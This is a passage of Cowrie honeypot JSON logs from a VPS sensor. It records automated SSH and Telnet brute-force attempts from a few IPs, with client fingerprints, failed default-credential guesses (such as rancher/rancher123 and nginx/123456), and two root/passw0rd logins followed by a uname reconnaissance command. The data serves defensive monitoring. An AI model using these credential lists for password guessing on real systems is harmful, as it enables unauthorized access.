,"aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T05:37:26.068774Z","src_ip":"212.227.235.229","session":"74379ae275a3"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"123456","message":"login attempt [nginx/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:37:26.507386Z","src_ip":"212.227.125.160","session":"a2d4eb815c3b"}
{"eventid":"cowrie.login.failed","username":"lucia","password":"lucia","message":"login attempt [lucia/lucia] failed","sensor":"my-vps","timestamp":"2025-08-28T05:37:26.743289Z","src_ip":"212.227.235.229","session":"74379ae275a3"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:37:27.614436Z","src_ip":"212.227.125.160","session":"a2d4eb815c3b"}
{"eventid":"cowrie.login.failed","username":"lucia","password":"lucia1","message":"login attempt [lucia/lucia1] failed","sensor":"my-vps","timestamp":"2025-08-28T05:37:27.902959Z","src_ip":"212.227.235.229","session":"74379ae275a3"}
{"eventid":"cowrie.login.failed","username":"lucia","password":"lucia123","message":"login attempt [lucia/lucia123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:37:29.040629Z","src_ip":"212.227.235.229","session":"74379ae275a3"}
{"eventid":"cowrie.login.failed","username":"lucia","password":"lucia1234","message":"login attempt [lucia/lucia1234] failed","sensor":"my-vps","timestamp":"2025-08-28T05:37:30.189535Z","src_ip":"212.227.235.229","session":"74379ae275a3"}
{"eventid":"cowrie.login.failed","username":"lucia","password":"lucia12345","message":"login attempt [lucia/lucia12345] failed","sensor":"my-vps","timestamp":"2025-08-28T05:37:31.332183Z","src_ip":"212.227.235.229","session":"74379ae275a3"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:37:32.489025Z","src_ip":"212.227.235.229","session":"74379ae275a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38792,"dst_ip":"1.2.3.4","dst_port":22,"session":"74ae9c324601","protocol":"ssh","message":"New connection: 212.227.235.229:38792 (1.2.3.4:22) [session: 74ae9c324601]","sensor":"my-vps","timestamp":"2025-08-28T05:37:33.377444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:37:33.378051Z","src_ip":"212.227.235.229","session":"74ae9c324601"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:37:33.521473Z","src_ip":"212.227.235.229","session":"74ae9c324601"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"123456","message":"login attempt [nginx/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:37:33.963260Z","src_ip":"212.227.235.229","session":"74ae9c324601"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:37:35.108190Z","src_ip":"212.227.235.229","session":"74ae9c324601"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39544,"dst_ip":"1.2.3.4","dst_port":22,"session":"f94fcf4a3f50","protocol":"ssh","message":"New connection: 212.227.125.160:39544 (1.2.3.4:22) [session: f94fcf4a3f50]","sensor":"my-vps","timestamp":"2025-08-28T05:37:41.147682Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:37:41.163918Z","src_ip":"212.227.125.160","session":"f94fcf4a3f50"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:37:41.288109Z","src_ip":"212.227.125.160","session":"f94fcf4a3f50"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher123","message":"login attempt [rancher/rancher123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:37:41.675371Z","src_ip":"212.227.125.160","session":"f94fcf4a3f50"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:37:42.785256Z","src_ip":"212.227.125.160","session":"f94fcf4a3f50"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50582,"dst_ip":"1.2.3.4","dst_port":22,"session":"199d26c41a09","protocol":"ssh","message":"New connection: 212.227.235.229:50582 (1.2.3.4:22) [session: 199d26c41a09]","sensor":"my-vps","timestamp":"2025-08-28T05:37:51.504900Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:37:51.505918Z","src_ip":"212.227.235.229","session":"199d26c41a09"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:37:51.649768Z","src_ip":"212.227.235.229","session":"199d26c41a09"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher123","message":"login attempt [rancher/rancher123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:37:52.224489Z","src_ip":"212.227.235.229","session":"199d26c41a09"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:37:53.370752Z","src_ip":"212.227.235.229","session":"199d26c41a09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40508,"dst_ip":"1.2.3.4","dst_port":22,"session":"050ba0380758","protocol":"ssh","message":"New connection: 212.227.125.160:40508 (1.2.3.4:22) [session: 050ba0380758]","sensor":"my-vps","timestamp":"2025-08-28T05:37:55.820211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:37:55.851349Z","src_ip":"212.227.125.160","session":"050ba0380758"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:37:55.945086Z","src_ip":"212.227.125.160","session":"050ba0380758"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:37:56.359233Z","src_ip":"212.227.125.160","session":"050ba0380758"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:37:56.617940Z","src_ip":"212.227.125.160","session":"050ba0380758"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:37:56.618701Z","src_ip":"212.227.125.160","session":"050ba0380758"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:37:56.736055Z","src_ip":"212.227.125.160","session":"050ba0380758"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:37:56.737333Z","src_ip":"212.227.125.160","session":"050ba0380758"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42718,"dst_ip":"1.2.3.4","dst_port":22,"session":"d48fc53e781c","protocol":"ssh","message":"New connection: 212.227.235.229:42718 (1.2.3.4:22) [session: d48fc53e781c]","sensor":"my-vps","timestamp":"2025-08-28T05:38:04.272869Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:38:04.501392Z","src_ip":"212.227.235.229","session":"d48fc53e781c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:38:04.545355Z","src_ip":"212.227.235.229","session":"d48fc53e781c"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:38:05.407585Z","src_ip":"212.227.235.229","session":"d48fc53e781c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:38:05.802810Z","src_ip":"212.227.235.229","session":"d48fc53e781c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:38:05.803528Z","src_ip":"212.227.235.229","session":"d48fc53e781c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:05.949315Z","src_ip":"212.227.235.229","session":"d48fc53e781c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:05.950911Z","src_ip":"212.227.235.229","session":"d48fc53e781c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48196,"dst_ip":"1.2.3.4","dst_port":22,"session":"1548bb9f154d","protocol":"ssh","message":"New connection: 212.227.125.160:48196 (1.2.3.4:22) [session: 1548bb9f154d]","sensor":"my-vps","timestamp":"2025-08-28T05:38:11.041429Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:38:11.070587Z","src_ip":"212.227.125.160","session":"1548bb9f154d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:38:11.156355Z","src_ip":"212.227.125.160","session":"1548bb9f154d"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher","message":"login attempt [rancher/rancher] failed","sensor":"my-vps","timestamp":"2025-08-28T05:38:11.567579Z","src_ip":"212.227.125.160","session":"1548bb9f154d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46032,"dst_ip":"1.2.3.4","dst_port":23,"session":"905b6140eaa0","protocol":"telnet","message":"New connection: 212.227.235.229:46032 (1.2.3.4:23) [session: 905b6140eaa0]","sensor":"my-vps","timestamp":"2025-08-28T05:38:12.488787Z"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:12.674180Z","src_ip":"212.227.125.160","session":"1548bb9f154d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44686,"dst_ip":"1.2.3.4","dst_port":22,"session":"885b510cd0c4","protocol":"ssh","message":"New connection: 212.227.235.229:44686 (1.2.3.4:22) [session: 885b510cd0c4]","sensor":"my-vps","timestamp":"2025-08-28T05:38:19.279147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:38:19.287552Z","src_ip":"212.227.235.229","session":"885b510cd0c4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:38:19.429965Z","src_ip":"212.227.235.229","session":"885b510cd0c4"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher","message":"login attempt [rancher/rancher] failed","sensor":"my-vps","timestamp":"2025-08-28T05:38:19.996684Z","src_ip":"212.227.235.229","session":"885b510cd0c4"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:21.142915Z","src_ip":"212.227.235.229","session":"885b510cd0c4"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":56726,"dst_ip":"1.2.3.4","dst_port":23,"session":"34b7607cbc3e","protocol":"telnet","message":"New connection: 8.222.212.69:56726 (1.2.3.4:23) [session: 34b7607cbc3e]","sensor":"my-vps","timestamp":"2025-08-28T05:38:23.150274Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34328,"dst_ip":"1.2.3.4","dst_port":22,"session":"ded617da00cd","protocol":"ssh","message":"New connection: 212.227.125.160:34328 (1.2.3.4:22) [session: ded617da00cd]","sensor":"my-vps","timestamp":"2025-08-28T05:38:25.938097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:38:25.964940Z","src_ip":"212.227.125.160","session":"ded617da00cd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:38:26.048165Z","src_ip":"212.227.125.160","session":"ded617da00cd"}
{"eventid":"cowrie.login.failed","username":"es","password":"123456","message":"login attempt [es/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:38:26.608374Z","src_ip":"212.227.125.160","session":"ded617da00cd"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:38:27.731357Z","src_ip":"212.227.125.160","session":"ded617da00cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34448,"dst_ip":"1.2.3.4","dst_port":22,"session":"689b2ffd0b8c","protocol":"ssh","message":"New connection: 212.227.125.160:34448 (1.2.3.4:22) [session: 689b2ffd0b8c]","sensor":"my-vps","timestamp":"2025-08-28T05:38:40.950230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:38:40.997729Z","src_ip":"212.227.125.160","session":"689b2ffd0b8c"}
